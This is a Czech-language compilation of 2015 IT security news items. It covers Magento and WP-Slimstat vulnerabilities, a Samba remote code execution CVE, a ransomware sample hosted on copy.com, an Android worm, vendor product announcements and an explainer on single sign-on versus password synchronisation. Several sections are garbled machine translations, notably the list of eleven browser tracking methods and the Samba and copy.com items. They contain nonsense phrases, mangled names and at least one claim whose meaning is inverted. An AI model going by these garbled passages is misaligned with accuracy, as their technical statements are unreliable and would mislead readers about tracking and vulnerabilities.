V tomto příběhu tedy nefiguruje žádný padouch, ale zcela zjevně u nás existují určité procesní nedostatky. Podle našich zásad mělo dojít při odchodu správce z oddělení IT ke změně hesla pro Lab Manager.

Dále jsme měli nedokumentované servery se zákaznickými daty, což odporuje přijatým bezpečnostním zásadám. Proč ale nedošlo k žádnému upozornění e-mailem nebo k jiným oznámením z Lab Manageru, že došlo k poskytnutí serverů?

Chci také zjistit, proč zprovozněné servery neodpovídaly instalaci naší předdefinované výchozí bitové kopii, která obsahuje náš software pro správu systémů, záplaty, antivirový software a zabezpečený operační systém.

Napadá mě ještě jedna další otázka: Proč nám náš systém SIEM (Security Information and Event Management, správa událostí a informací zabezpečení) nenahlásil, že se v naší demilitarizované zóně objevily nové IP adresy? Tím se určitě budu muset vážně zabývat.


Rizikové obchodování na platformě eBay způsobila kritická zranitelnost

21.5.2015 Riziko
Kritickou zranitelnost typu RCE (vzdálené spuštění kódu) objevila v e-commerce platformě eBay Magento firma Check Point.

Pokud se zneužije, může útočník plně ohrozit jakýkoli internetový obchod na platformě Magento a získat například informace o kreditních kartách a další finanční a osobní údaje zákazníků.

Zranitelnost umožňuje jakémukoli útočníkovi obejít všechny bezpečnostní mechanismy a získat kontrolu na obchodem a také získat jeho kompletní databázi.

„On-line nakupování je stále oblíbenější, takže stránky obchodů jsou čím dál častěji terčem hackerů. Jsou pro ně zlatým dolem plným informací o kreditních kartách,“ říká Shahar Tal, Malware and Vulnerability Research Manager ve společnosti Check Point Software Technologies.
 

„Odhalená zranitelnost představuje významnou hrozbu, nejenom pro jeden obchod, ale pro všechny maloobchodní značky, které používají platformu Magento pro své on-line obchody, což představuje asi 30 % e‑commerce trhu.“

Analytici minulý týden oznámili, že útočníci ze dvou IP adres patřících Rusku se snaží zneužít zmíněné zranitelnosti - začínají tím, že se snaží vytvořit falešný administrátorský účet, který pak pravděpodobně později využijí k nekalým činnostem.

Není tedy záhodno váhat nad instalací příslušné patche, která je už pro platformu Magento k dispozici.


IBM představila dva nové cloudové nástroje pro analýzu bezpečnostních hrozeb

21.5.2015 Software
IBM včera představila dvě nové cloudové služby postavení na softwaru QRadar, které IT expertům ve firmách umožní lépe vyhodnocovat možné bezpečnostní hrozby.

IBM od akvizice společnosti Q1 Labs v roce 2011 doposud prodávala bezpečnostní software QRadar pouze tradiční cestou tak, že uživatelé zaplatili poplatek a stáhli si kopii softwaru do svého počítače. Včera však americká společnost spustila dvě nové bezpečnostní služby postavené na této aplikaci, které fungují na cloudu.

První z nich je služba IBM Security Intelligence on Cloud, která má webmasterům ve firmách usnadnit zkoumání toho, zda jsou nečekané události zaznamenané v jejich síti pouhými anomáliemi či opravdovými bezpečnostními hrozbami. Díky spojení s QRadarem nová služba firmám umožňuje v reálném čase porovnávat zaznamenané události s informacemi o hrozbách z více než 500 zdrojů.

Druhou službou postavenou na QRadaru, kterou IBM včera představila, pak je Intelligent Log Management on Cloud, jejímž cílem je zjednodušit sběr bezpečnostních dat a reporting.

„Bezpečnostní experti z firem nám říkali, že chtějí lepší kontrolu nad svými hybridními IT systémy,“ uvedl viceprezident pro produktový management a strategii v IBM Security Jason Corbin. „A přesně to jim prediktivní analýza na cloudu poskytne.“

Oba dva nové produkty budou dostupné od poloviny května, cena zatím nebyla zveřejněna.


Single sign-on vs. synchronizace hesel: Výhody a nevýhody

2.3.2015 Zabezpečení
Téměř všichni uživatelé v podnikových IT prostředích neustále řeší problém, jak si zapamatovat velké množství různých přihlašovacích jmen a k nim odpovídajících hesel do mnoha různých aplikací. Ve větších firmách přitom mnohdy jde o desítky přístupových údajů.

Při kombinaci různých přihlašovacích jmen, rozličných heslových politik či požadavků na nutnost měnit heslo v pravidelných intervalech je pak pro zaměstnance téměř nemožné si všechny odpovídající údaje zapamatovat.

Naštěstí existuje několik řešení, jež mohou uživatelům výše uvedené problémy pomoci překonat. Níže uvádíme dvě velmi významné – single sign-on a synchronizaci hesel. Z hlediska samotného uživatele sice nabízejí podobnou funkci, avšak každé ji řeší jinak.
Single sign-on (SSO)

Single sign-on, nebo zkráceně SSO, centralizuje autentizační proces uživatele do jednoho místa nazývaného také poskytovatel identity. Poskytovatel identity dělá autentizaci uživatele a tyto údaje pak poskytuje ostatním aplikacím (nazývaným též poskytovatelé služeb), které uživatel běžně používá.

Zjednodušeně lze základní fungování SSO popsat následovně: Uživatel chce pracovat v aplikaci A, ale není autentizovaný. Aplikace ho tedy přesměruje na poskytovatele identit (SSO), kde vykoná příslušnou autentizaci. Pokud je úspěšná, je přesměrován zpět do aplikace A, s níž může pracovat.

Později chce uživatel použít aplikaci B, do které se zatím neautentizoval. Ta se poskytovatele identit dotáže, zda se u něj uživatel již dříve autentizoval. Pokud se zjistí, že ano, vrátí aplikaci B zpět potřebnou informaci s tím, že si tato aplikace převezme autentizační informace a umožní uživateli vstup.

Některá řešení SSO obsahují také tlustého klienta SSO pro koncové stanice (je jej třeba nainstalovat na všechny koncové stanice), který pak komunikuje s poskytovatelem identit i s cílovou aplikací a zajišťuje předávání autentizačních údajů. Rozšiřuje se tak okruh aplikací, které lze k SSO připojit.
· Výhody

Cíl SSO je zřejmý: Uživatel se na začátku své práce autentizuje pouze jedenkrát k poskytovateli identit (SSO). Ostatní aplikace pak již uživatel může běžně používat bez nutnosti se k nim znovu zvlášť autentizovat.

U cílových aplikací dokonce nemusí uživatel v některých případech ani znát své uživatelské heslo, protože aplikace sama o sobě důvěřuje údajům dodaným poskytovatelem identit.
· Nevýhody

Úzkým místem SSO je silná vazba na centrální bod – poskytovatele identit. Stane-li se poskytovatel identit nedostupným, stanou se nedostupnými i aplikace na něj napojené.

Za další „problémovou“ vlastnost lze považovat i to, že je nutné upravit každou aplikaci napojovanou na SSO, tak aby při procesu autentizace uživatele místo standardního přihlašovacího dialogu vykonala přesměrování na poskytovatele identit a dále aby dokázala přijímat a zpracovávat autentizační informace od poskytovatele identit.

Třetí nevýhodou, třebaže nejde přímo o vlastnost SSO, je nutnost pořídit SSO jako samostatný produkt. To samozřejmě zatěžuje rozpočty firem, které tak v mnoha případech nechtějí do SSO investovat a snaží se problém řešit jiným způsobem. Alternativním řešením pro mnohé organizace může být použití některého z open source produktů.

Známá SSO řešení, se kterými se ve zdejších končinách lze potkat, jsou například OpenAM, CA SiteMinder, NetIQ SecureLogin a mnoho dalších. Další SSO řešení známá spíše mimo podnikové sítě jsou OpenID, MojeID, přihlašování pomocí účtu na Googlu nebo na Facebooku.

Synchronizace hesel

Ačkoliv z pohledu uživatele nabízí synchronizace hesel podobný komfort jako SSO (uživatel si nemusí pamatovat spousty různých hesel), funguje zcela odlišně. Velmi jednoduchý scénář použití lze popsat následovně: V síti existuje centrální bod, kam se uživatel přihlásí a jednoduchým způsobem si změní heslo.

To se pak distribuuje do ostatních aplikací napojených na centrální bod. Uživatel sice musí při práci s koncovou aplikací znovu zadat autentizační údaje, ale použije jedno a totéž heslo, které si nastavil v předchozím kroku.

Synchronizaci hesel nelze koupit jako samostatný produkt, ale je vždy součástí nějakého jiného produktu jako jedna z jeho služeb. Nejčastěji jde o produkty správy identit – identity managementu (IdM). Přitom dnes už de facto jakýkoliv vyspělý produkt pro správu identit podporuje synchronizaci hesel, některé z nich dokonce i obousměrnou.

Tady jsou nejznámější: CA IdentityMinder, Oracle IdM, NetIQ IdM, IBM IdM, Microsoft Forefront Identity Manager, z open source systémů jde například o Evolveum MidPoint či ForgeRock OpenIDM.
· Výhody

Hlavní výhoda synchronizace hesel oproti SSO je zřejmá – není tak silná vazba koncových aplikací na centrální bod. Uživatelé mohou s koncovými aplikacemi pracovat i v případě, že se centrální bod stane nedostupným. Problém nastává pouze v případě, že uživatel potřebuje změnit heslo a nemůže se na centrální bod připojit.

Další výhodou, naznačenou již v předchozích odstavcích, je skutečnost, že synchronizace hesel je v drtivé většině případů součástí systémů pro správu identit. Pokud tedy firma správu identit nasazuje nebo používá, může spolu s tím využívat i synchronizaci hesel jako „bonus“ navíc.

Také lze tímto způsobem vyřešit i požadavek na dodržování politiky hesel v aplikacích, které tuto funkcionalitu jinak nemají. Uživatel si změní heslo v centrálním bodě, který ověří heslo proti příslušné politice, a pokud je vše v pořádku, vykoná distribuci hesla i do dalších aplikací.

Třetí výhodou je jednodušší nasazení v IT prostředí. Většinou totiž není třeba nijak upravovat cílové aplikace, neboť se využívá jejich přirozeného API rozhraní. Menší problémy mohou nastat pouze v případě, že je nutné synchronizovat hesla z cílové aplikace do centrálního bodu IdM (typickým příkladem budiž Active Directory), ale všechny „dospělé“ produkty správy identit si i s tímto požadavkem dokážou elegantně poradit.
· Nevýhody

Třebaže nejsou nevýhody na první pohled vidět, je třeba si uvědomit, že nasazení synchronizace hesel může snížit bezpečnost. Útočníkovi stačí uhodnout heslo uživatele do jedné aplikace a rázem má přístup i ke všem dalším, do kterých je heslo synchronizované. Některé firmy proto volí kompromis, kdy jsou například hesla synchronizované pouze v aplikacích, které nejsou dostupné z internetu.

Dalším problémem může být sladění politik hesel napříč aplikacemi. Obecně platí, že nejpřísnější politika se uplatňuje v aplikaci, ve které si uživatel mění heslo (tedy nejčastěji je to IdM), a v ostatních je politika hesel stejná nebo mírnější. Ovšem ne vždy lze politiky sladit tak, aby tomuto pravidlu vyhovovaly.
Volba podle potřeb

Nelze jednoznačně říci, které z výše popsaných řešení je lepší a které horší, vždy záleží na konkrétní situaci a IT prostředí v konkrétní firmě. Někdy je dokonce vhodné obě řešení kombinovat.

Ať už se firma rozhodne implementovat jedno či druhé, měla by si ale uvědomit, že základním kamenem pro vaše správné rozhodnutí je důkladná analýza.


Nové firemní bezpečnostní řešení představil Eset, nabízí revoluční změny

27.2.2015 Software
Novou generaci svých bezpečnostních produktů pro firemní zákazníky včera oznámil Eset. Kromě zlepšené ochrany před hrozbami nabízejí i zcela přepracovaný administrátorský nástroj, díky kterému mohou systémy Esetu využít i opravdu velké firmy.

Velkých změn doznal právě nástroj Eset Remote Administrator (ERA). Už totiž není potřeba mít speciálního klienta, díky webové konzoli správci dnes mohou získat jak kompletní přehled nad bezpečnostní situací v síti, tak detailní možnosti nastavení bezpečnostních parametrů, z běžného internetového prohlížeče.

Správní konzole je navíc plně lokalizovaná i do češtiny a příslušný server může běžet nejen v prostředí Windows, ale i na Linuxu (a k dispozici je i virtuální appliance pro využití na virtuální stroji).

Administraci usnadní i možnost vytvářet si vlastní widgety, které pak přehledně neustále ukazují ty informace, kterou jsou pro příslušného správce důležité. Zajímavá je správa stanic – například se lze dozvědět, jaký SW je na příslušném stroji nainstalovaný, jak je na tom s aktualizacemi, zda neobsahuje podezřelé programy apod.

Zjednodušuje se i použití skupin i politik a vylepšila se podoba reportů, které jsou nově přehlednější včetně podpory šablon a nabízejí různé typy výstupů – grafické, textové, CVS apod.

Důležitá je i podpora virtualizovaných prostředí, kdy Eset kromě řešení postaveného na VMware vShieldu nabízí i vlastní pokročilou ochranu označovanou jako Shared Local Cache, které umožňují mnohem podrobnější kontrolu jednotlivých virtuálních strojů, avšak bez zbytečného navýšení výpočetních i jiných zdrojů.

Co se týče řešení Endpoint Solutions 6, mezi hlavní inovace nových verzí patří například další vrstvy ochrany před hrozbami, jako jsou Botnet Protection, Exploit Blocker, Anti-Phishing či Anti-Theft. Prvně jmenovaná chrání počítače před infiltrací malwarem, šířeným s pomocí botnetů.

Exploit Blocker zase zajišťuje ochranu stanic před dosud neznámými hrozbami, tzv. zero day útoky. Sleduje chování procesů a hledá podezřelé aktivity, které jsou pro exploity typické. Chrání často zneužívané aplikace, jako jsou internetové prohlížeče, čtečky PDF, poštovní klienti nebo Java.

Anti-Phishing chrání uživatele před pokusy získat jejich citlivé informace, což ve firemním prostředí znamená především přístupové údaje k aplikacím a systémům.

I pro mobilní zařízení Eset přinesl zlepšení – Endpoint Security 2 pro Android nabízí například modul pro kontrolu aplikací, základní podporu pro MDM, vzdálenou administraci integrovanou do klasické správní konzole Esetu či podporu anti-phishingu.


WordPress obsahuje kritickou chybu, ohrožené jsou miliony webů

25.2.2015 Zranitelnosti
Více než milion webových stránek, které běží na platformě WordPress, je vystavených potenciálním útokům hackerů, kteří zneužívají zranitelnost v doplňku zvaném WP-Slimstat.

Všechny dřívější verze Slimstatu kromě té aktuální (3.9.6) obsahují jednoduchý klíč, jenž je možné uhodnout. Tento klíč je podle společnosti Sucuri využíván k podepisování odesílaných a přijímaných dat z počítačů koncových uživatelů.

Útočníci v důsledku toho mohou použít speciální techniku, která umožňuje získat vysoce citlivá data včetně šifrovaných hesel a šifrovacích klíčů používaných ke vzdálené správě webových stránek.
 

„Pokud u své webové stránky používáte starší verzi tohoto přídavku, riskujete,“ uvedl Marc-Alexandre Montpas ze Sucuri. „Úspěšné zneužití této díry by mohlo vyústit v tzv. útoky typu Blind SQL Injection, díky nimž by útočník mohl získat citlivé informace z vaší databáze včetně uživatelského jména, (zašifrovaného) hesla a v některých případech také bezpečnostního klíče WordPress (což by mohlo v konečném důsledku znamenat kompletní převzetí správy nad vaším webem),“ uvedla Sucuri v příspěvku na svém blogu.

Jak dodávají bezpečnostní experti, útočník by mohl využít Internetový archiv k zjištění toho, v kterém roce byla stránka zprovozněna. Díky tomu by mu stačilo otestovat pouze několik desítek milionů kombinací, což by zvládl během necelých deseti minut. Jakmile útočník získá klíč, může začít "tahat" data z databáze.

WP-Slimstat je analytický nástroj, který si podle WordPressu stáhl již více než milion lidí. Pokud je to i váš případ, měli byste tento přídavek ihned aktualizovat na novější verzi.


11 způsobů, jak sledovat svůj pohybuje, když pomocí webového prohlížeče
26.2.2015 Blog

Existuje celá řada různých případů použití na sledování uživatelů, kteří používají určité webové stránky. Některé z nich jsou více "zlověstný" a pak další. U většiny webových aplikací, je nutná nějaká forma sledování relace k udržování stavu uživatele. To se obvykle snadno provést pomocí dobře nakonfigurované cookies (a nikoli do působnosti tohoto článku). Session mají být pomíjivá a nebude trvat dlouho.

Na druhé straně, některé metody sledování se pokusí sledovat uživatele po dlouhou dobu, a zejména na snaze, aby bylo obtížné se vyhnout sledování. To se někdy provádí k reklamním účelům, ale lze provést i zastavit některé útoky, jako hovado povinnost nebo identifikovat útočníky, které vrátí na webu. V nejhorším případě, ze soukromého hlediska, sledování se provádí následovat uživatele napříč různých webových stránkách.

Za ta léta, prohlížeče a pluginy poskytly řadu způsobů, jak omezit toto sledování. Zde jsou některé z nejčastějších metod, jak se sledování provádí a jak uživatel může zabránit (část) je:

1 - Cookies
Cookies jsou určeny k udržování stavu mezi různými požadavky. Prohlížeč pošle cookie při každém požadavku, jakmile je nastavena pro konkrétní místa. Z hlediska ochrany osobních údajů, doba platnosti a doména cookie jsou nejdůležitější nastavení. Většina prohlížečů cookies odmítal nastavené jménem jiném místě, pokud uživatel umožňuje tyto soubory cookie být nastaven. Správné cookie relace by neměly používat datum vypršení platnosti, jak by měl skončit, jakmile prohlížeč je uzavřen. Most prohlížeč nabídku znamená přezkoumat, kontrola a odstranění souborů cookie. V minulosti, "Cookie2" záhlaví byl navržen pro soubory cookie pro sezení, ale toto záhlaví se již nepoužívá a prohlížeč přestat podporovat.

https://www.ietf.org/rfc/rfc2965.txt
http://tools.ietf.org/html/rfc6265

2 - Flash cookies (místní sdílené objekty)
Flash má vlastní perzistence mechanismus. Tyto "Flash cookies" jsou soubory, které může být ponecháno na straně klienta. Nemohou být nastaveny jménem jiných lokalit ("Cross-Origin"), ale scénář SWF může vystavit na obsah LSO na jiné skripty, které mohou být použity k provedení ukládání cross-původu. Nejlepší způsob, jak zabránit flash cookies ve sledování vás je zakázat blesk. Správa flash cookies je složité a obvykle vyžaduje speciální pluginy.

https://helpx.adobe.com/flash-player/kb/disable-local-shared-objects-flash.html

3 - IP adresa
IP adresa je asi nejzákladnější sledování mechanismus veškeré komunikace na bázi IP, ale ne vždy spolehlivé jako IP adresy uživatele se může kdykoliv změnit, a více uživatelů často sdílejí stejnou IP adresu. Můžete použít různé výrobky nebo systémy VPN jako Tora, aby se vaše IP adresa byly použity, aby vás sledovat, ale to obvykle přichází s hitem výkonu. Některé moderní JavaScript rozšíření (RTC zejména) mohou být použity k získání IP adresu uživatele, který může být použit k vyřešení nejasnosti zavedené NAT. Ale RTC ještě není implementována ve všech prohlížečích. IPv6 může poskytnout další metody používat IP adresy k identifikaci uživatele, protože se méně pravděpodobné, že se setkáme s problémy s NAT.

http://ipleak.net

4 - User Agent
User-Agent string odeslán prohlížečem, je téměř vždy jedinečný ve výchozím nastavení, ale spyware někdy modifikuje User-Agent přidat jedinečné hodnoty, k tomu. Mnoho prohlížečů umožňují nastavení User-Agent a více nedávno, prohlížeče začal snižovat informace v User-Agent, nebo dokonce dělal to trochu dynamický, aby odpovídala očekávaný obsah. Non-Spyware plugins někdy změnit User-Agent ukázat podporu pro konkrétní funkce.

5 - Browser otisků prstů
Webový prohlížeč je sotva kdy jeden jednolitý kus softwaru. Místo toho, webové prohlížeče komunikovat s různými pluginy a jeho rozšíření uživatel může mít nainstalovány. Minulé práce ukázala, že kombinace plugin verze a možností konfigurace vybraný uživatelem bývá překvapivě jedinečný a tato technika byla použita k odvození jedinečných identifikátorů. Není mnoho můžete udělat, aby se tomu zabránilo, další pak minimalizovat počet pluginů nainstalujete (ale to může být ukazatel v sobě)

https://panopticlick.eff.org

6 - Místní úložiště
HTML 5 nabízí dva nové způsoby ukládání dat na klientovi: místní úložiště a relace Storage. Místní úložiště je velmi užitečný pro trvalé úložiště na straně klienta, a s tím sledování uživatele. Přístup na lokální úložiště je omezena na webu, který data odeslal. Některé prohlížeče implementovat ladění funkce, které umožňují uživateli, aby přezkoumala uložená data. Úložiště relace je omezena na určité okno a je odstraněn, jakmile se okno zavřeno.

https://html.spec.whatwg.org/multipage/webstorage.html

7 - Cached Content
Prohlížeče obsahu vyrovnávací paměti založené na záhlaví vypršení poskytovaných serverem. Webová aplikace může obsahovat jedinečný obsah stránky, a pak použít JavaScript zkontrolovat, zda je obsah mezipaměti, či nikoli za účelem identifikace uživatele. Tato technika může být realizována pomocí obrázků, písma nebo skoro žádné obsahu. Je těžké se bránit proti, pokud si pravidelně (například při zavření prohlížeče) odstranit veškerý obsah. Některé prohlížeče umožňují do mezipaměti žádný obsah vůbec. Ale toto může způsobit značné problémy s výkonem. V poslední době Google byl viděn s použitím písma sledování uživatelů, ale technika není nic nového. Mezipaměti JavaScript lze snadno použít k nastavení jedinečné sledování ID.

http://robertheaton.com/2014/01/20/cookieless-user-tracking-for-douchebags/
http://fontfeed.com/archives/google-webfonts-the-spy-inside/

8 - Canvas Fingerprinting
Jedná se o novější techniku ​​a v podstatě zvláštní formu prohlížeče otisků prstů. HTML 5 představil "plátno", API, které umožňuje JavaScript nakreslit obrázek ve vašem prohlížeči. Kromě toho je možné číst obraz, který byl vytvořen. Jak to dopadá, konfigurace písma a další paramters jsou natolik jedinečné za následek mírně odlišných snímků při použití totožné kód JavaScript nakreslit obrázek. Tyto rozdíly mohou být použity k odvození identifikátor prohlížeče. Nic moc, co můžete udělat, aby tomu zabránili. Nejsem si vědom prohlížeč, který vám umožní zakázat funkci plátna, a skoro všechny rozumně aktuální prohlížeče podpořit v nějaké formě.

https://securehomes.esat.kuleuven.be/~gacar/persistent/index.html

9 - Veřejné vstřikovaného Hlavičky
Verizon nedávno přidal vstřikování konkrétní hlavičky do HTTP požadavků na identifikaci uživatele. Vzhledem k tomu, se provádí "za letu", to funguje pouze pro HTTP a HTTPS ne. Každý uživatel je přiřazena konkrétní ID a ID je vstříknut do všech požadavků HTTP, jako X-UIDH záhlaví. Verizon nabízí pro placený, že webové stránky lze použít k získání demografické informace o uživateli. Ale jen sám o sobě, záhlaví může být použit pro sledování uživatelů, protože zůstává spojena s uživateli po delší dobu.

http://webpolicy.org/2014/10/24/how-verizons-advertising-header-works/

10 - přesměrování
To je trochu o varitation na "mezipaměti obsahu" sledování. Pokud je uživatel přesměrován pomocí "301" ("Permanent Redirect") kódu, pak prohlížeč bude pamatovat přesměrování a vytáhněte cílovou stránku hned, ne první návštěvě původní stránku. Tak například, pokud kliknete na odkaz "isc.sans.edu", bych mohl přesměrovat na "isc.sans.edu/index.html?id=sometrackingid". Příště půjdete do "isc.sans.edu" Váš prohlížeč automaticky přejde přímo do druhého URL. Tato technika je méně spolehlivá pak některé z dalších technik prohlížeče se liší v tom, jak mezipaměti přesměrování.

https://www.elie.net/blog/security/tracking-users-that-block-cookies-with-a-http-redirect

11 - Cookie respawning / Synchronizace
Některé z výše uvedených metod má docela jednoduché protiopatření. Aby to těžší uživatelům vyhnout sledování, místa často kombinovat různé metody a "respawn" cookies. Tato technika se někdy odkazoval se na jako "Evercookie". V případě, že uživatel odstraní například HTTP cookie, ale ne Flash Cookie, Flash Cookie se používá k znovu vytvořit HTTP cookie na uživatele další návštěvu.

https://www.cylab.cmu.edu/files/pdfs/tech_reports/CMUCyLab11001.pdf


Samba zranitelnost - Vzdálené spuštění kódu - (CVE-2015 do 0240)
25.2.2015 Zranitelnosti

Bezpečnostní tým Red Hat vydala informační zpravodaj na Samba zranitelnost provádějící Samba verze 3.5.0 přes 4.2.0rc4. "To může být zneužita škodlivý Samba klienta zasláním speciálně vytvořený pakety na Samba serveru. Není nutná žádná ověření se zneužít. Může to vést k dálkově řízeným spuštění libovolného kódu jako root." [1]

Patch [2], byl propuštěn týmem Samba řešit zranitelnost.

[1] https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

[2] https://www.samba.org/samba/history/security.html


Copy.com používá k distribuci Crypto ransomware
25.2.2015 Viry

Díky Marco za zaslání vzorku dalšího kusu krypto-výkupného malware. Soubor byl získán po návštěvě kompromisní webu (www.my- sda24.com). Zajímavé je, že malware sám byl uložen na copy.com.

Copy.com je cloud založený služba sdílení souborů, cílení na firemní uživatele. Je to běh Barracuda, společnost také známý pro jeho e-mail a web filtrování produktů, které chrání uživatele před právě takové malware. K jeho cti, Barracuda odstranit malware během několika minut Marco najít.

Alespoň teď, detekce pro tento vzorek není velký. Podle VirusTotal, 8 z 57 virus motorů identifikovat soubor jako škodlivý [1]. URL blacklist přístup může určit původní místo jako škodlivý, ale copy.com je nepravděpodobné, že budou blokovány. To se stalo velmi populární pro ničemové k ukládání škodlivých souborů na cloudové služby, zejména v případě, že nabízejí bezplatné zkušební účty. Ne všechny z nich jsou stejně rychle jako Barracuda odstranit tyto soubory.

[1] https://www.virustotal.com/en/file/
1473d1688a73b47d1a08dd591ffc5b5591860e3deb79a47aa35e987b2956adf4/analysis/


IT security Meeting 2015 ukáže nové směry v antimalwarových řešeních

25.2.2015 Viry
Konference IT Security Meeting 2015, kterou pořádá společnost Auriga Systems za podpory magazínů Computerworld a Security World, nabídne nejnovější informace o pokročilých technologiích obsažených v produktech firem Eset, Kaspersky, McAfee a Novell. Akce se uskuteční ve dnech 19. - 20. 3. 2015 v Brně a Praze, a také 23. 4. 2015 v Praze.

Konkrétně půjde o dvě samostatné akce, kdy mezi hlavní témata první z nich patří představení zcela nové generace antivirového řešení Eset pro firemní použití a novinek v portfoliu Novell, jejichž osvědčené řešení pro bezpečnou komunikaci a řízení identit lze efektivně využít v prostředí firem jakékoli velikosti.

Na samostatné akci v Praze se účastníci dozvědí o moderních technologiích pro boj s novodobými kybernetickými hrozbami v podání bezpečnostního řešení Kaspersky.

Druhá část prezentace pak bude zaměřená na představení technologie McAfee SIEM pro sběr a vyhodnocování logů a McAfee DLP pro ochranu citlivých informací před jejich únikem a jejich praktické využitelnosti v podnikovém prostředí.

Akce je po registraci na adrese obchod@aurigasystems.cz a následném potvrzení registrace zcela bezplatná.


Cyber Security ukázala, jak se lépe bránit kybernetickým útokům

24.2.2015 Analýza
Konference Cyber Security 2015, kterou pořádalo IDG spolu s firmou Cisco, ukázala, jak rychle se kybernetický zločin profesionalizuje, což značně znesnadňuje dostatečně účinnou reakci na kybernetický útok tradičními prostředky. Cestou vpřed ale může být integrace bezpečnostních řešení přímo do síťové infrastruktury.

Malware se dnes mění tak rychle, že systém, který se dokáže bránit jen známým hrozbám, je útočníkům v podstatě vystaven na milost a nemilost. Obrana proti kybernetické bezpečnosti musí fungovat před útokem, v jeho průběhu, ale i po něm.

Jakmile už útok vypukne, mají bezpečnostní specialisté jen omezené šance adekvátně reagovat. Například u rozsáhlejší sítě musejí až na několika stovkách zařízení s několika tisíci rozhraní změnit konfiguraci tak, aby dokázali napadenou část sítě oddělit a tím zabránit rozsáhlejším škodám.

„Něco takového ale zabere spoustu času,“ říká Ivo Němeček, generální ředitel Cisco ČR a dodává: „Může se tak docela dobře stát, že tou dobou už nebude co chránit a s trochou nadsázky řečeno, kolem bude jen dým a spálená země.“

Dosavadní koncept síťové infrastruktury vycházel z obrany na hranicích sítě. Na vstupních bodech do sítě byla nainstalována bezpečnostní zařízení, která měla bránit proniknutí škodlivého kódu do sítě.

Metody dnešních kybernetických zločinců jsou ale natolik sofistikované, že podobný postup již nefunguje. Celá řada kybernetických útoků vzniká „na míru“, pro napadení konkrétního cíle. Nebyly předtím nikdy použity, a tudíž tento kód není tradičními řešeními kybernetické bezpečnosti považován za škodlivý.

„Bezpečnostní prvky, které budou zvládat současné kybernetické hrozby, musí reagovat na základě analýzy konkrétních dat, která síť přenáší. Vyhodnocení tohoto provozu v reálném čase pak dovolí detekovat podezřelé chování a přijmout příslušná opatření,“ Martin Rehák, bezpečnostní expert firmy Cisco. Bezpečnostní algoritmy podle něj proto musejí být proto integrovány přímo do síťové infrastruktury.

Nebezpečné váhání

Nedávno publikovaný výzkum Cisco Annual Security Report zjistil alarmující skutečnost, že nemalé procento IT odborníků podceňuje instalaci pravidelných bezpečnostních aktualizací. Ukázalo se například, že 56 procent firem stále používá knihovny OpenSSL starší než 50 měsíců.

Tyto knihovny přitom stále obsahují bezpečnostní mezeru, která je známa jako Heartbleed. Stejně tak například pouze desetina uživatelů programu Internet Explorer používá jeho nejnovější verzi. Přitom známé zranitelnosti tohoto programu, které jsou v nejnovější verzi odstraněny, využívá až 31 procent útoků.

Pomoci mohou automatické aktualizace. Právě ty mohou pomoci bránit se aktuálním kybernetickým hrozbám. Nejnovější verze programů a aplikací, stejně jako pravidelně vydávané bezpečnostní aktualizace, totiž odstraňují známé bezpečnostní hrozby, které útočníci využívají nejčastěji. Například rozšíření nejnovější verze platformy Java se projevilo poklesem počtu útoků na tuto platformu o více než třetinu.

Efektivní ochrana proti současným bezpečnostním hrozbám je jedním z nejdůležitějších důvodů pro automatizaci. „Například intrusion prevention system útok zjistí a může dát pokyn řídícímu prvku k takovému nastavení sítě, které útok zastaví. To je jeden ze směrů, kterým se ubírá vývoj v oblasti bezpečnosti,“ vysvětluje Rehák a připomíná, že v tradičním modelu síťové infrastruktury je efektivní obrana proti aktuálním kybernetickým hrozbám stále obtížnější.

„Útoku se musíme začít bránit ještě dříve, než vůbec začne. Nelze čekat na to, až se malware v síti projeví. Obrana musí potenciálně škodlivý kód odhalit a automaticky ho odstavit od komunikace se zbytkem sítě,“ doplňuje Rehák.


Ochrana proti hrozbám poprvé na úrovni CPU

24.2.2015 Zabezpečení
Nová technologie, kterou získal Check Point akvizicí izraelské firmy Hyperwise, nabídne prevenci proti hrozbám na úrovni procesoru. Umožní tak prý zastavit útoky ještě před tím, než k nim vůbec dojde.

Hyperwise vyvinula technologii pro prevenci hrozeb na úrovni procesorů, což umožňuje eliminovat hrozby ještě v před-infekční fázi. Prevence před možným zneužitím zranitelností poskytuje vyšší úspěšnost zachycení hrozeb.

V současnosti se prevence proti hrozbám tradičně zaměřuje především na detekci a blokování malwaru, ale až poté, co je malware již aktivní, takže nejsou pokryty rané fáze útoku.
 

Zakladatelé Hyperwise a celý tým se začlení do provozu Check Pointu a technologie budou integrovány do stávajícího portfolia Check Point Threat Emulation. Neočekává se, že by transakce měla významný vliv na finanční výsledky. Podmínky transakce nebyly zveřejněny.

„Akvizice společnosti Hyperwise nám umožní využít pokročilé technologie a odborné znalosti. Zákazníci získají lepší kybernetickou ochranu, která identifikuje a zastaví nejširší škálu útoků hned při prvním kontaktu,“ dodává Gil Shwed, CEO a předseda představenstva společnosti Check Point Software Technologies.


Nový červ krade data z telefonů s Androidem

22.2.2015 Viry
Až příště vypnete svůj androidový telefon, raději z něj také vyjměte baterii. Společnost AVG totiž objevila nebezpečného červa, který předstírá vypnutí telefonu a následně ze zařízení krade data.

Jak uvedlo AVG, jakmile uživatel zmáčkne na svém androidovém telefonu infikovaném novým červem tlačítko na zapnutí/vypnutí, objeví se falešné dialogové okno. Červ následně zobrazí (falešnou) animaci, která se ukazuje při vypínání telefonu a poté se zařízení tváří jako vypnuté.

„I když je obrazovka černá, telefon však stále běží,“ uvedlo AVG. „Když je telefon v tomto stavu, červ může provádět hovory, pořizovat fotografie a vykonávat řadu dalších úkonů bez uživatelova vědomí.“

Červ může infikovat pouze telefon, který si uživatel sám upravil (tzv. rootoval). Díky tomu je v bezpečí většina běžných uživatelů, kteří své telefony nijak neupravují. Jak však uvedlo AVG, někteří výrobci své telefony prodávají již narootované, díky čemuž červ může tato zařízení snáze infikovat.

Není příliš pravděpodobné, že by se nový červ objevil v Google Play Store, jelikož Google blokuje aplikace s potenciálně rizikovými funkcemi. V e-shopech s aplikacemi třetích stran byste na něj však mohli bez problémů narazit. Jak radí AVG, pokud si tedy chcete být jisti, že je váš telefon opravdu vypnutý, raději z něj vyjměte baterii.


Lenovo instalovalo na své laptopy nebezpečný software

22.2.2015 Zranitelnosti
Čínská společnost Lenovo přiznala, že na své notebooky předinstalovávala software, který vystavoval uživatele riziku potenciálního útoku hackerů a uvedla, že v brzké době vydá nástroj, pomocí kterého bude možné zmíněnou aplikaci odstranit.

